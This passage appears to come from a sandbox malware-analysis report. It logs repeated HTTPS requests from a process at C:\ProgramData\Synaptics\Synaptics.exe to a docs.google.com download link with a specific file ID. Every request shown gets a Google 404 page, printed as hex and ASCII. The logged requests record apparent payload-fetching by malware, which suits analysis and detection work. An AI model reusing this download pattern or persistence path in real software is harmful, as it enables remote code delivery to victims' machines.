                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:47 UTC400INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:47 UTC400INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6e 34 69 4d 4f 48 31 69 73 62 6f 51 64 57 4c 72 45 79 38 79 56 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="n4iMOH1isboQdWLrEy8yVA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:47 UTC401INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:47 UTC401INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        131192.168.2.349891142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:47 UTC398OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:47 UTC401INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:47 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-bfEo8bv5vgm3j/EJ4T1H4A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:47 UTC403INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 48 61 43 2f 54 51 6d 31 42 6b 66 69 50 5a 53 37 6d 65 4f 68 63 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="HaC/TQm1BkfiPZS7meOhcA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:31:47 UTC404INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:31:47 UTC404INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        132192.168.2.349892142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:47 UTC401OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:47 UTC404INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:47 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-9p/dYz2IGL8dVCLIg+Ra1w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:47 UTC406INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6c 2f 33 45 69 6c 34 39 56 6a 6c 55 71 4f 68 37 50 73 7a 4c 5a 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="l/3Eil49VjlUqOh7PszLZw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:31:47 UTC407INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:31:47 UTC408INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        133192.168.2.349894142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:47 UTC404OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:48 UTC408INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:48 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-sikC54Z9CYuCuX58malXGQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:48 UTC409INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:48 UTC409INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 58 4a 42 57 52 6b 34 70 34 4e 46 4e 75 62 75 54 68 7a 4a 56 42 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="XJBWRk4p4NFNubuThzJVBQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:48 UTC410INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:48 UTC411INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        134192.168.2.349896142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:48 UTC408OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:48 UTC411INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:48 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-uvWEHMsPkbyuEgWLPOk4Tw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:48 UTC412INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:48 UTC412INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 41 4b 58 6a 66 4c 59 49 76 53 50 58 35 6a 4c 76 4c 74 46 6b 4c 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="AKXjfLYIvSPX5jLvLtFkLA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:48 UTC413INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:48 UTC414INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        135192.168.2.349898142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:48 UTC411OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:48 UTC414INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:48 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-2I0GaLQ6f8M/eqagjV/TJA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
